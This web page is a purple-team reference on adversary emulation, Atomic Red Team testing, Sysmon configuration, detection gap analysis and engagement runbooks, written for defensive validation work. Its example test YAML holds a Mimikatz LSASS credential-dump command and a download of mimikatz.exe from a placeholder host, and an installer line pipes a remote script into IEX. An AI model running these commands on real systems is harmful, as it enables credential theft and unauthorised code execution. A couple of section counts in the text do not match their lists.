BT
Privacy ToolboxJournalProjectsResumeBookmarks
Feed
Privacy Toolbox
Journal
Projects
Resume
Bookmarks
Intel
CIPHER
Threat Actors
Privacy Threats
Dashboard
CVEs
Tags
Intel
CIPHERThreat ActorsPrivacy ThreatsDashboardCVEsTags

Intel

  • Feed
  • Threat Actors
  • Privacy Threats
  • Dashboard
  • Privacy Toolbox
  • CVEs

Personal

  • Journal
  • Projects

Resources

  • Subscribe
  • Bookmarks
  • Developers
  • Tags
Cybersecurity News & Analysis
github
defconxt
•
© 2026
•
blacktemple.net
  • MITRE ATT&CK
  • Purple Team
  • OSINT Tradecraft
  • Recon Tools
  • ICS/SCADA
  • Mobile Security
  • Threat Intelligence
  • Emerging Threats
  • Breach Case Studies
  • Purple Team Exercises
  • DevSecOps
  • Secure Coding
  • Developer Security
  • Encoding & Manipulation
  • Network Protocols
  • AI Pentesting
  • Curated Resources
  • Supplementary
  • MITRE ATT&CK
  • Purple Team
  • OSINT Tradecraft
  • Recon Tools
  • ICS/SCADA
  • Mobile Security
  • Threat Intelligence
  • Emerging Threats
  • Breach Case Studies
  • Purple Team Exercises
  • DevSecOps
  • Secure Coding
  • Developer Security
  • Encoding & Manipulation
  • Network Protocols
  • AI Pentesting
  • Curated Resources
  • Supplementary
  1. CIPHER
  2. /Reference
  3. /Purple Team Deep Dive — Adversary Emulation, Detection Validation & Gap Analysis

Purple Team Deep Dive — Adversary Emulation, Detection Validation & Gap Analysis

Purple Team Deep Dive — Adversary Emulation, Detection Validation & Gap Analysis

CIPHER training material for [MODE: PURPLE] operations. Last updated: 2026-03-14


Table of Contents

  1. Adversary Emulation Plan Structure
  2. Atomic Red Team Test Execution
  3. Detection Coverage Gap Analysis Methodology
  4. Sysmon Configuration for Maximum Visibility
  5. HELK & DetectionLab Setup
  6. ATT&CK Navigator Layer Creation
  7. Purple Team Engagement Runbook

1. Adversary Emulation Plan Structure

Source Framework: CTID Adversary Emulation Library

The Center for Threat-Informed Defense maintains emulation plans for real-world threat actors. Available full plans cover: APT29, Blind Eagle, Carbanak, FIN6, FIN7, menuPass, OceanLotus, OilRig, Sandworm, Turla, Wizard Spider.

Micro emulation plans target compound behaviors: Active Directory Enumeration, Data Exfiltration, DLL Sideloading, File Access/Modification, Log Clearing, Named Pipes, Process Injection, Reflective Loading, Remote Code Execution, User Execution, Web Shells, Windows Registry.

Emulation Plan Document Structure

EMULATION PLAN: [Threat Actor / Campaign Name]
===================================================

1. INTELLIGENCE SUMMARY
   - Threat actor profile (aliases, attribution, motivation)
   - Targeting patterns (sectors, geographies, infrastructure)
   - Historical campaigns with dates and references
   - Known tooling and malware families
   - ATT&CK group reference (e.g., G0016 for APT29)

2. OPERATIONAL FLOW
   - High-level kill chain / attack graph
   - Phase dependencies and decision points
   - Scenario scope (what is emulated vs. out of scope)

   Example phases:
     Phase 1: Initial Access (spearphishing, supply chain)
     Phase 2: Execution & Persistence
     Phase 3: Discovery & Lateral Movement
     Phase 4: Collection & Exfiltration
     Phase 5: Impact (if applicable)

3. STEP-BY-STEP PROCEDURES
   For each step:
   - Step ID (e.g., 1.A.1)
   - ATT&CK Technique ID (e.g., T1566.001)
   - Procedure description (human-readable)
   - Platform / prerequisites
   - Command(s) or tool invocation
   - Expected output / observable artifacts
   - Detection opportunity (telemetry sources, log events)
   - Cleanup / rollback procedure

4. DETECTION PLAN (Blue Team Counterpart)
   For each step:
   - Expected telemetry source (Sysmon Event ID, Windows Event ID, EDR)
   - Sigma/KQL/SPL detection rule or reference
   - Blind spots and assumptions
   - False positive considerations

5. ATT&CK NAVIGATOR LAYER
   - JSON layer file mapping all techniques exercised
   - Color-coded by detection maturity (red = no coverage, yellow = partial, green = validated)

Building a Custom Emulation Plan

Step 1: Select threat actor relevant to your organization's threat model
Step 2: Gather CTI — MITRE ATT&CK group page, vendor reports, OSINT
Step 3: Map observed TTPs to ATT&CK techniques
Step 4: Sequence procedures into operational phases
Step 5: For each procedure, identify:
        - Atomic Red Team test (if available)
        - Alternative tooling (Caldera, manual)
        - Expected telemetry and detection rules
Step 6: Build Navigator layer for the plan
Step 7: Document detection expectations BEFORE execution
Step 8: Execute, validate, gap-analyze

2. Atomic Red Team Test Execution

Test YAML Schema

Atomic Red Team tests are organized by ATT&CK technique ID under atomics/T####/T####.yaml.

attack_technique: T1059.001
display_name: "Command and Scripting Interpreter: PowerShell"
atomic_tests:
  - name: "Mimikatz - Creds from Memory"
    auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
    description: "Dumps credentials from LSASS using Mimikatz"
    supported_platforms:
      - windows
    input_arguments:
      mimikatz_path:
        description: "Path to Mimikatz executable"
        type: path
        default: "C:\\tools\\mimikatz.exe"
    executor:
      name: powershell           # powershell | command_prompt | bash | sh | manual
      command: |
        #{mimikatz_path} "privilege::debug" "sekurlsa::logonpasswords" exit
      cleanup_command: |
        Remove-Item #{mimikatz_path} -Force -ErrorAction Ignore
      elevation_required: true
    dependencies:
      - description: "Mimikatz must be present"
        prereq_command: |
          if (Test-Path #{mimikatz_path}) { exit 0 } else { exit 1 }
        get_prereq_command: |
          Invoke-WebRequest -Uri "https://example.com/mimikatz.exe" -OutFile #{mimikatz_path}
    dependency_executor_name: powershell

Key schema elements:

  • input_arguments: Parameterized with #{variable_name} substitution syntax
  • executor.name: Determines shell context — powershell, command_prompt, bash, sh, manual
  • dependencies: Pre-flight checks with automated prerequisite installation
  • cleanup_command: Post-test system restoration
  • elevation_required: Flags tests needing admin/root

Invoke-AtomicRedTeam Execution Commands

Installation

# Install the module
Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser

# Download atomic tests
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics

Core Execution Commands

# Run all tests for a technique
Invoke-AtomicTest T1059.001

# Run specific test numbers
Invoke-AtomicTest T1059.001 -TestNumbers 1,2
Invoke-AtomicTest T1059.001-1,2              # short form

# Run by test name
Invoke-AtomicTest T1059.001 -TestNames "PowerShell Downgrade Attack"

# Run by GUID
Invoke-AtomicTest T1003 -TestGuids 5c2571d0-1572-416d-9676-812e64ca9f44

# Run ALL techniques (use with caution)
Invoke-AtomicTest All

# Skip confirmation prompts
Invoke-AtomicTest T1059.001 -Confirm:$false

# Set execution timeout
Invoke-AtomicTest T1059.001 -TimeoutSeconds 30

# Interactive mode (step through)
Invoke-AtomicTest T1003 -Interactive

Prerequisite Management

# Check and install prerequisites
Invoke-AtomicTest T1003 -GetPrereqs

# Check prereqs for specific test
Invoke-AtomicTest T1003 -TestGuids <guid> -GetPrereqs

Cleanup

# Run cleanup for a technique
Invoke-AtomicTest T1003 -Cleanup

# Cleanup specific test
Invoke-AtomicTest T1003 -TestGuids <guid> -Cleanup

Automated Bulk Execution (Purple Team Sweep)

# Iterate all Windows-supported non-manual tests
$techniques = Get-ChildItem C:\AtomicRedTeam\atomics\* -Recurse -Include T*.yaml |
              Get-AtomicTechnique

foreach ($technique in $techniques) {
    foreach ($atomic in $technique.atomic_tests) {
        if ($atomic.supported_platforms.contains("windows") -and
            ($atomic.executor -ne "manual")) {

            # Install prerequisites
            Invoke-AtomicTest $technique.attack_technique `
                -TestGuids $atomic.auto_generated_guid -GetPrereqs

            # Execute test
            Invoke-AtomicTest $technique.attack_technique `
                -TestGuids $atomic.auto_generated_guid

            Start-Sleep 3

            # Cleanup
            Invoke-AtomicTest $technique.attack_technique `
                -TestGuids $atomic.auto_generated_guid -Cleanup
        }
    }
}

Custom Atomics Path

$PSDefaultParameterValues = @{
    "Invoke-AtomicTest:PathToAtomicsFolder" = "C:\AtomicRedTeam\atomics"
}

Linux Execution (via PowerShell Core)

# Install pwsh on Debian/Ubuntu
apt-get install -y powershell

# Install module
pwsh -c 'Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser -Force'

# Run test
pwsh -c 'Invoke-AtomicTest T1053.003 -TestNumbers 1'

3. Detection Coverage Gap Analysis Methodology

Framework: Palantir Alerting and Detection Strategy (ADS)

Every detection rule should be documented with these nine sections before production deployment:

ALERTING AND DETECTION STRATEGY
================================
1. Goal              — What adversary behavior does this detect?
2. Categorization    — ATT&CK tactic/technique mapping
3. Strategy Abstract — High-level detection approach
4. Technical Context — Data sources, log fields, processing logic
5. Blind Spots       — What this detection CANNOT see
                       (e.g., encrypted channels, kernel-level evasion)
6. Assumptions       — What must be true for detection to work
                       (e.g., Sysmon installed, PowerShell logging enabled)
7. False Positives   — Specific legitimate scenarios that trigger
                       (NOT "legitimate admin activity" — name the tool/process)
8. Validation        — How to confirm the detection works
                       (link to Atomic Red Team test or manual procedure)
9. Priority          — Alert severity and escalation path
10. Response         — Analyst investigation steps when alert fires

Gap Analysis Process

PHASE 1: INVENTORY CURRENT DETECTIONS
--------------------------------------
- Export all active SIEM rules/alerts
- Map each rule to ATT&CK technique IDs
- Score detection maturity per technique:
    0 = No detection
    1 = Log source available but no rule
    2 = Rule exists, not validated
    3 = Rule exists, validated with Atomic test
    4 = Rule validated, tuned, low false positive rate
    5 = Rule validated, tuned, tested against evasion variants

PHASE 2: MAP THREAT LANDSCAPE
------------------------------
- Identify relevant threat actors (industry, geography, asset type)
- Extract their ATT&CK technique sets from CTI
- Overlay threat actor techniques on your coverage matrix

PHASE 3: IDENTIFY GAPS
------------------------
- Techniques used by relevant actors with maturity < 3 = GAP
- Prioritize gaps by:
    1. Frequency of use across threat actors
    2. Impact if undetected (credential access > discovery)
    3. Feasibility of detection (data source availability)
    4. Compensating controls in place

PHASE 4: DEVELOP DETECTIONS
-----------------------------
- For each prioritized gap:
    a. Identify required data source (Sysmon event, Windows event, network)
    b. Verify data source is collected and indexed
    c. Write detection rule (Sigma preferred for portability)
    d. Document as ADS
    e. Validate with Atomic Red Team test
    f. Tune false positives in staging
    g. Deploy to production with monitoring period

PHASE 5: CONTINUOUS VALIDATION
-------------------------------
- Schedule recurring Atomic test execution (weekly/monthly)
- Automate: run test -> wait -> query SIEM -> assert alert fired
- Track coverage percentage over time
- Re-run gap analysis quarterly or after major infrastructure changes

Detection Coverage Scoring Matrix

Score Label Criteria
0 None No data source, no rule
1 Telemetry Data source collected but no detection logic
2 Draft Detection rule written, not validated
3 Validated Rule fires on known-good test (Atomic/manual)
4 Tuned Rule validated + false positives addressed + documented ADS
5 Resilient Rule tested against evasion variants + blind spots documented

D3FEND Integration for Gap Analysis

MITRE D3FEND provides a defensive countermeasure knowledge graph complementary to ATT&CK. Use it to systematically verify coverage across six defensive tactics:

D3FEND Tactic Purpose Example Techniques
Model Asset discovery, dependency mapping Asset Inventory, Vulnerability Analysis
Harden Reduce attack surface Certificate Pinning, Disk Encryption, Code Signing
Detect Identify malicious activity File Analysis, Behavior Monitoring, Network Traffic Analysis
Isolate Contain and segment DNS Denylisting, Executable Allowlisting, Network Segmentation
Deceive Mislead adversaries Honeynets, Decoy Credentials, Decoy Network Resources
Evict Remove threat presence Credential Rotation, Process Termination
Restore Recovery operations System Image Recovery, Data Backup Restoration

For each ATT&CK technique in your gap analysis, query D3FEND for mapped countermeasures. This reveals not just detection gaps but hardening, isolation, and deception opportunities.


4. Sysmon Configuration for Maximum Visibility

Configuration Approaches

Two primary open-source configs serve different use cases:

Config Author Philosophy Best For
sysmon-config SwiftOnSecurity Balanced, educational, minimal perf impact Production baseline
sysmon-modular Olaf Hartong Modular, composable, granular control Advanced/research environments

Sysmon Event Types for Purple Team Coverage

Event ID Category Purple Team Value
1 Process Creation Execution, command-line logging, parent-child relationships
3 Network Connection C2 detection, lateral movement, data exfiltration
5 Process Terminated Process lifecycle tracking
6 Driver Loaded Rootkit detection, vulnerable driver abuse (BYOVD)
7 Image Loaded DLL sideloading, injection detection
8 CreateRemoteThread Process injection (T1055)
10 Process Access Credential dumping (LSASS access), process hollowing
11 File Created Payload drops, staging directories
12-14 Registry Events Persistence mechanisms, config changes
15 FileCreateStreamHash Alternate data streams (T1564.004)
17-18 Pipe Events Named pipe pivoting, C2 channels (Cobalt Strike)
19-21 WMI Events WMI persistence, lateral movement
22 DNS Query C2 domain resolution, DNS tunneling
23 File Delete (archived) Anti-forensics detection, evidence destruction
24 Clipboard Change Data collection monitoring
25 Process Tampering Process hollowing, herpaderping
26 File Delete Logged File deletion tracking (lightweight)

sysmon-modular: Building a Custom Config

# Clone the repository
git clone https://github.com/olafhartong/sysmon-modular.git
cd sysmon-modular

# Merge all modules into a single config
# Uses the PowerShell merge function
Import-Module .\Merge-SysmonXml.ps1
Merge-AllSysmonXml -Path (Get-ChildItem '[0-9]*\*.xml') -AsString |
    Out-File sysmonconfig.xml

# Available pre-built configs:
#   sysmonconfig.xml         — Default balanced
#   sysmonconfig-verbose.xml — All events, exclusions only
#   sysmonconfig-research.xml — Maximum logging (NOT for production)
#   sysmonconfig-mde-augment.xml — Complement Microsoft Defender for Endpoint

Recommended Purple Team Sysmon Config Strategy

PRODUCTION ENVIRONMENT
  Use: SwiftOnSecurity or sysmon-modular default
  Rationale: Low performance impact, proven exclusions
  Tune: Add org-specific exclusions (AV, backup agents, known-good)

PURPLE TEAM LAB / TESTING
  Use: sysmon-modular verbose or research config
  Rationale: Maximum visibility to validate what telemetry tests produce
  Warning: Research config generates extreme log volume

DETECTION DEVELOPMENT
  Use: sysmon-modular with selective modules
  Rationale: Enable only event types relevant to technique under test
  Example: Testing T1055 (Process Injection) -> enable Events 1, 8, 10, 25

Installation Commands

# Windows — Install Sysmon with config
sysmon.exe -accepteula -i sysmonconfig.xml

# Update running config
sysmon.exe -c sysmonconfig.xml

# Verify current config
sysmon.exe -s

# Linux — Install Sysmon for Linux
# (requires sysinternalsebpf package)
sudo sysmon -accepteula -i sysmonconfig-linux.xml

Critical Tuning Rules for Purple Team

<!-- MUST INCLUDE: LSASS access monitoring for credential dumping -->
<RuleGroup groupRelation="or">
  <ProcessAccess onmatch="include">
    <TargetImage condition="is">C:\Windows\system32\lsass.exe</TargetImage>
  </ProcessAccess>
</RuleGroup>

<!-- MUST INCLUDE: Suspicious parent-child process relationships -->
<RuleGroup groupRelation="or">
  <ProcessCreate onmatch="include">
    <ParentImage condition="is">C:\Windows\System32\cmd.exe</ParentImage>
    <ParentImage condition="is">C:\Windows\System32\wscript.exe</ParentImage>
    <ParentImage condition="is">C:\Windows\System32\mshta.exe</ParentImage>
    <ParentImage condition="is">C:\Windows\System32\rundll32.exe</ParentImage>
  </ProcessCreate>
</RuleGroup>

<!-- MUST INCLUDE: Named pipe events for C2 detection -->
<RuleGroup groupRelation="or">
  <PipeEvent onmatch="exclude">
    <!-- Exclude known-good pipes, include everything else -->
    <PipeName condition="is">\PSHost</PipeName>
  </PipeEvent>
</RuleGroup>

5. HELK & DetectionLab Setup

HELK (Hunting ELK)

Architecture:

                    +-----------------+
                    |  Jupyter        |
                    |  Notebooks      |
                    +--------+--------+
                             |
+----------+    +------------+------------+    +-----------+
| Logstash | -> | Elasticsearch           | -> |  Kibana   |
| (ingest) |    | (index + search)        |    |  (viz)    |
+----------+    +------------+------------+    +-----------+
                             |
                    +--------+--------+
                    |  Apache Spark   |
                    |  + GraphFrames  |
                    +-----------------+

Components:

  • Elasticsearch: Event storage, full-text search, aggregations
  • Logstash: Log ingestion, parsing, enrichment
  • Kibana: Dashboards, visualizations, investigation UI
  • Apache Spark: Distributed analytics, SQL queries over events
  • Jupyter Notebooks: Interactive threat hunting, hypothesis testing
  • GraphFrames: Entity relationship analysis (process trees, network graphs)

Deployment (Docker-based):

# Clone HELK
git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/docker

# Run installer
sudo ./helk_install.sh

# Options during install:
#   Option 1: HELK + ELK (basic)
#   Option 2: HELK + ELK + Spark + Jupyter (full analytics)
#   Option 3: HELK + ELK + Spark + Jupyter + KSQL (streaming)
#   Option 4: HELK + ELK + Spark + Jupyter + KSQL + Elastalert (alerting)

# Access points after install:
#   Kibana:   https://<helk-ip>
#   Jupyter:  https://<helk-ip>:8888
#   Spark UI: https://<helk-ip>:4040

Ingesting Sysmon Logs into HELK:

Method 1: Winlogbeat (recommended)
  - Install Winlogbeat on Windows endpoints
  - Configure output to HELK Logstash (port 5044)
  - Winlogbeat ships Sysmon events from Windows Event Log

Method 2: NXLog
  - Alternative log shipper for Windows
  - Configure to forward Sysmon channel to Logstash

Method 3: Kafka input (for high-volume environments)
  - HELK supports Kafka as message broker
  - Winlogbeat -> Kafka -> Logstash -> Elasticsearch

Purple Team Use Cases:

  • Run Atomic Red Team test on endpoint
  • Observe events arrive in Kibana within seconds
  • Query Elasticsearch for specific technique artifacts
  • Use Jupyter notebooks for complex hunt queries (e.g., process tree analysis)
  • Build Spark-based analytics for anomaly detection

DetectionLab

Note: DetectionLab is no longer actively maintained as of January 2023. Consider Splunk Attack Range or custom lab builds as alternatives.

Architecture:

+-------------------+     +-------------------+
|   DC (Domain      |     |   WEF (Windows    |
|   Controller)     |     |   Event Forwarding)|
|   - Active Dir    |     |   - Splunk Fwdr   |
|   - DNS           |     |   - Sysmon        |
|   - GPO           |     |   - osquery/Fleet |
+-------------------+     +-------------------+
         |                          |
         +----------+---------------+
                    |
            +-------+-------+
            |    Logger     |
            |  - Splunk     |
            |  - Zeek       |
            |  - Suricata   |
            |  - Guacamole  |
            +---------------+

Pre-installed Tooling:

  • Splunk with pre-created indexes and forwarder
  • Sysmon with sysmon-modular config (Olaf Hartong)
  • osquery + Fleet management
  • Microsoft ATA
  • Zeek + Suricata for network monitoring
  • Apache Guacamole for browser-based VM access
  • PowerShell transcript logging enabled
  • Windows Event Forwarding subscriptions configured

Deployment Options:

  • VirtualBox / VMware (local)
  • AWS / Azure via Terraform
  • HyperV, LibVirt, Proxmox

Splunk Attack Range (Recommended Active Alternative)

# Docker Compose deployment (recommended)
git clone https://github.com/splunk/attack_range.git
cd attack_range
docker compose up -d

# Access points:
#   Web UI:   http://localhost:4321
#   REST API: http://localhost:4000 (OpenAPI at /openapi/swagger)

# Two-step build process:
#   1. Provision infrastructure via Web UI or CLI
#   2. Connect VPN (WireGuard) to lab network
#   3. Continue build to finalize environment

# Run Atomic Red Team simulation:
#   - Via Web UI: select technique, click simulate
#   - Via API: POST to simulation endpoint
#   - Via CLI: attack_range simulate -t T1059.001

Attack Range deploys:

  • Splunk (central analytics)
  • Windows Server / Workstation (targets)
  • Linux hosts
  • Optional: Kali Linux, Zeek, additional monitors
  • Supports AWS, Azure, GCP via Terraform + Ansible

6. ATT&CK Navigator Layer Creation

Layer JSON Structure (v4.x)

{
    "name": "Purple Team Coverage - Q1 2026",
    "versions": {
        "attack": "15",
        "navigator": "5.1",
        "layer": "4.5"
    },
    "domain": "enterprise-attack",
    "description": "Detection coverage assessment for purple team engagement",
    "filters": {
        "platforms": ["Windows", "Linux", "macOS"]
    },
    "sorting": 0,
    "layout": {
        "layout": "side",
        "aggregateFunction": "average",
        "showID": true,
        "showName": true,
        "showAggregateScores": false,
        "countUnscored": false,
        "expandedSubtechniques": "annotated"
    },
    "hideDisabled": false,
    "techniques": [
        {
            "techniqueID": "T1059.001",
            "tactic": "execution",
            "color": "#31a354",
            "comment": "Validated with ART test T1059.001-1. Sigma rule: proc_creation_win_powershell_suspicious_cmd.yml",
            "score": 4,
            "enabled": true,
            "metadata": [
                { "name": "detection_rule", "value": "sigma/proc_creation_win_powershell_suspicious_cmd.yml" },
                { "name": "atomic_test", "value": "T1059.001-1" },
                { "name": "last_validated", "value": "2026-03-01" },
                { "name": "data_source", "value": "Sysmon Event 1" }
            ],
            "links": [
                { "label": "Sigma Rule", "url": "https://github.com/SigmaHQ/sigma/..." },
                { "label": "ART Test", "url": "https://github.com/redcanaryco/atomic-red-team/..." }
            ],
            "showSubtechniques": true
        }
    ],
    "gradient": {
        "colors": ["#ff6666", "#ffeb3b", "#66bb6a"],
        "minValue": 0,
        "maxValue": 5
    },
    "legendItems": [
        { "label": "No Coverage (0)", "color": "#ff6666" },
        { "label": "Telemetry Only (1)", "color": "#ff9800" },
        { "label": "Draft Rule (2)", "color": "#ffeb3b" },
        { "label": "Validated (3)", "color": "#c6e377" },
        { "label": "Tuned (4)", "color": "#66bb6a" },
        { "label": "Resilient (5)", "color": "#1b5e20" }
    ],
    "showTacticRowBackground": true,
    "tacticRowBackground": "#dddddd",
    "selectTechniquesAcrossTactics": true,
    "selectSubtechniquesWithParent": false,
    "selectVisibleTechniques": false
}

Programmatic Layer Generation (Python)

"""Generate ATT&CK Navigator layer from detection inventory."""
import json
import uuid
from typing import Optional

COVERAGE_COLORS = {
    0: "#ff6666",   # No coverage — red
    1: "#ff9800",   # Telemetry only — orange
    2: "#ffeb3b",   # Draft rule — yellow
    3: "#c6e377",   # Validated — light green
    4: "#66bb6a",   # Tuned — green
    5: "#1b5e20",   # Resilient — dark green
}

def create_layer(
    name: str,
    techniques: list[dict],
    domain: str = "enterprise-attack",
    description: str = "",
) -> dict:
    """
    Create an ATT&CK Navigator layer.

    Args:
        name: Layer display name
        techniques: List of dicts with keys:
            - techniqueID (str): e.g., "T1059.001"
            - tactic (str, optional): e.g., "execution"
            - score (int): 0-5 coverage score
            - comment (str, optional): notes
        domain: ATT&CK domain
        description: Layer description

    Returns:
        dict: Complete Navigator layer JSON
    """
    technique_entries = []
    for t in techniques:
        score = t.get("score", 0)
        entry = {
            "techniqueID": t["techniqueID"],
            "score": score,
            "color": COVERAGE_COLORS.get(score, "#ffffff"),
            "comment": t.get("comment", ""),
            "enabled": True,
        }
        if "tactic" in t:
            entry["tactic"] = t["tactic"]
        if "metadata" in t:
            entry["metadata"] = t["metadata"]
        technique_entries.append(entry)

    return {
        "name": name,
        "versions": {
            "attack": "15",
            "navigator": "5.1",
            "layer": "4.5",
        },
        "domain": domain,
        "description": description,
        "techniques": technique_entries,
        "gradient": {
            "colors": ["#ff6666", "#ffeb3b", "#66bb6a"],
            "minValue": 0,
            "maxValue": 5,
        },
        "legendItems": [
            {"label": f"{label} ({score})", "color": color}
            for score, color in COVERAGE_COLORS.items()
            for label in [
                ["No Coverage", "Telemetry Only", "Draft Rule",
                 "Validated", "Tuned", "Resilient"][score]
            ]
        ],
        "showTacticRowBackground": True,
        "tacticRowBackground": "#dddddd",
        "selectTechniquesAcrossTactics": True,
    }


def save_layer(layer: dict, filepath: str) -> None:
    """Save layer to JSON file for Navigator import."""
    with open(filepath, "w") as f:
        json.dump(layer, f, indent=2)


# Example usage:
if __name__ == "__main__":
    detections = [
        {"techniqueID": "T1059.001", "tactic": "execution", "score": 4,
         "comment": "PowerShell logging + Sigma rule validated"},
        {"techniqueID": "T1053.005", "tactic": "persistence", "score": 3,
         "comment": "Scheduled task creation monitored via Sysmon"},
        {"techniqueID": "T1055.001", "tactic": "defense-evasion", "score": 1,
         "comment": "Sysmon Event 8 collected, no rule written"},
        {"techniqueID": "T1003.001", "tactic": "credential-access", "score": 5,
         "comment": "LSASS access rule validated + evasion-tested"},
    ]

    layer = create_layer(
        name="Purple Team Coverage - Q1 2026",
        techniques=detections,
        description="Post-engagement detection coverage assessment",
    )
    save_layer(layer, "purple_team_coverage.json")

Layer Workflow for Purple Team

PRE-ENGAGEMENT:
  1. Export current detection rules
  2. Map rules to ATT&CK technique IDs
  3. Generate "current state" layer (baseline)
  4. Generate "threat actor" layer (techniques to test)
  5. Overlay layers in Navigator to see coverage vs. threat

POST-ENGAGEMENT:
  1. Update technique scores based on test results
  2. Generate "post-engagement" layer
  3. Diff baseline vs. post-engagement
  4. Highlight new gaps discovered
  5. Prioritize remediation backlog

ONGOING:
  - Regenerate layer monthly from detection inventory
  - Track coverage percentage trends
  - Compare against evolving threat landscape

7. Purple Team Engagement Runbook

Pre-Engagement Phase (1-2 Weeks Before)

STEP 1: SCOPE DEFINITION
  [ ] Define engagement objectives (specific questions to answer)
  [ ] Select threat actor(s) or technique set for emulation
  [ ] Identify in-scope systems, networks, and data
  [ ] Define rules of engagement (RoE):
      - Hours of operation
      - Excluded systems (production databases, safety systems)
      - Communication channels and escalation paths
      - Emergency stop procedures
  [ ] Obtain written authorization from system owners
  [ ] Brief SOC team (level of awareness: full knowledge / partial / blind)

STEP 2: THREAT INTELLIGENCE GATHERING
  [ ] Pull ATT&CK profile for selected threat actor(s)
  [ ] Review CTID emulation plan (if available)
  [ ] Identify applicable Atomic Red Team tests for each technique
  [ ] Supplement with SCYTHE community threats / custom procedures
  [ ] Build ATT&CK Navigator "threat actor" layer

STEP 3: DETECTION BASELINE
  [ ] Export current SIEM rules and map to ATT&CK
  [ ] Generate "current coverage" Navigator layer
  [ ] Overlay with threat actor layer — identify expected gaps
  [ ] Document detection hypotheses:
      "We EXPECT to detect T1059.001 via rule XYZ"
      "We DO NOT EXPECT to detect T1055.003 (no data source)"
  [ ] Ensure logging infrastructure is healthy:
      - Sysmon running and forwarding (verify with test event)
      - SIEM ingestion pipeline clear (check lag/backlog)
      - Endpoint agents reporting

STEP 4: LAB VALIDATION (Optional but Recommended)
  [ ] Run planned Atomic tests in lab environment first
  [ ] Verify tests produce expected artifacts
  [ ] Confirm cleanup procedures work
  [ ] Validate detection rules fire in lab

Execution Phase

STEP 5: EXECUTE EMULATION PLAN
  For each technique in the plan:

  RED TEAM (or automated):
    [ ] Announce technique ID to purple team coordinator
    [ ] Execute Atomic Red Team test (or manual procedure)
    [ ] Record:
        - Timestamp (UTC)
        - Technique ID + test number
        - Source host and user context
        - Exact command(s) executed
        - Observed outcome (success/failure/partial)
    [ ] Wait designated observation window (5-15 minutes)

  BLUE TEAM (simultaneously or after window):
    [ ] Check SIEM for alerts triggered by the technique
    [ ] Search raw logs for expected artifacts
    [ ] Record:
        - Alert fired? (yes/no/partial)
        - Time to detect (TTD) — execution timestamp to alert
        - Data source that captured the activity
        - Missing telemetry (expected event not present)
    [ ] If no detection: attempt manual hunt
        - What query would find this?
        - What data source is missing?

  COORDINATOR:
    [ ] Log result in engagement tracker:

    | Time (UTC)  | Technique    | Test         | Detected | TTD    | Rule         | Notes         |
    |-------------|--------------|--------------|----------|--------|--------------|---------------|
    | 14:32:00    | T1059.001-1  | ART #1       | YES      | 45s    | PS_Exec_01   | As expected   |
    | 14:47:00    | T1055.001-1  | ART #2       | NO       | N/A    | None         | No Event 8    |

    [ ] After each technique: brief discussion (2-3 min max)
    [ ] Run cleanup before next technique
    [ ] Proceed to next technique in plan

Post-Engagement Phase

STEP 6: GAP ANALYSIS
  [ ] Compile all results into detection coverage matrix
  [ ] Calculate metrics:
      - Detection rate: (techniques detected / techniques tested) * 100
      - Mean time to detect (MTTD) across all detected techniques
      - Coverage by tactic (which kill chain phases are weakest?)
      - Data source gaps (what telemetry is missing?)
  [ ] Generate post-engagement Navigator layer
  [ ] Diff pre vs. post layers

STEP 7: REMEDIATION PLANNING
  For each gap, produce a finding:

  [GAP-001]
  Technique  : T1055.001 — Process Injection: DLL Injection
  Test       : Atomic Red Team T1055.001-1
  Result     : NOT DETECTED
  Root Cause : Sysmon Event 8 (CreateRemoteThread) not enabled in config
  Remediation:
    1. Add CreateRemoteThread monitoring to Sysmon config
    2. Write Sigma rule for suspicious CreateRemoteThread targets
    3. Validate with ART test T1055.001-1
    4. Document as ADS with blind spots
  Priority   : HIGH (credential access dependency)
  Owner      : Detection Engineering
  Target Date: [date]

STEP 8: REPORT
  Purple Team Engagement Report Structure:

  1. Executive Summary
     - Engagement dates, scope, threat actor emulated
     - Detection rate (headline metric)
     - Top 3 critical gaps

  2. Methodology
     - Emulation plan reference
     - Tools used (Atomic Red Team, custom procedures)
     - Environment (production / lab / hybrid)

  3. Results Matrix
     - Full technique-by-technique results table
     - Navigator layer screenshots (before/after)

  4. Gap Analysis
     - Gaps by tactic
     - Root cause categorization:
         - Missing data source
         - Data source present, no rule
         - Rule present, not working
         - Rule working, too noisy (disabled)
     - Detection coverage trend (if repeat engagement)

  5. Remediation Roadmap
     - Prioritized gap findings with owners and dates
     - Quick wins (< 1 week)
     - Medium-term (1-4 weeks)
     - Strategic (requires infrastructure changes)

  6. Appendices
     - Full execution log with timestamps
     - Navigator layer JSON files
     - New/updated Sigma rules produced
     - ADS documents for new detections

STEP 9: FOLLOW-UP
  [ ] Track remediation items to completion
  [ ] Re-test remediated gaps (targeted validation)
  [ ] Update coverage Navigator layer
  [ ] Schedule next engagement (quarterly recommended)
  [ ] Feed findings into detection engineering backlog
  [ ] Update threat model with new intelligence

Purple Team Cadence

CONTINUOUS (Automated):
  - Weekly Atomic Red Team sweeps against critical techniques
  - Automated: execute test -> query SIEM -> assert detection
  - Alert on detection regression (previously detected, now missed)

QUARTERLY (Manual):
  - Full purple team engagement against selected threat actor
  - Update coverage baseline
  - Remediation sprint

ANNUAL:
  - Comprehensive ATT&CK coverage assessment
  - Full threat landscape re-evaluation
  - Strategic detection roadmap update

Reference: Key Tool Links

Tool Purpose URL
Atomic Red Team Test library by ATT&CK technique https://github.com/redcanaryco/atomic-red-team
Invoke-AtomicRedTeam PowerShell execution framework https://github.com/redcanaryco/invoke-atomicredteam
CTID Emulation Library Full adversary emulation plans https://github.com/center-for-threat-informed-defense/adversary_emulation_library
ATT&CK Navigator Visual coverage mapping https://github.com/mitre-attack/attack-navigator
sysmon-modular Composable Sysmon configs https://github.com/olafhartong/sysmon-modular
sysmon-config Baseline Sysmon config https://github.com/SwiftOnSecurity/sysmon-config
Palantir ADS Framework Detection documentation standard https://github.com/palantir/alerting-detection-strategy-framework
HELK Hunting ELK platform https://github.com/Cyb3rWard0g/HELK
Splunk Attack Range Cloud-based attack simulation lab https://github.com/splunk/attack_range
Sigma Vendor-agnostic detection rules https://github.com/SigmaHQ/sigma
MITRE D3FEND Defensive countermeasure knowledge graph https://d3fend.mitre.org
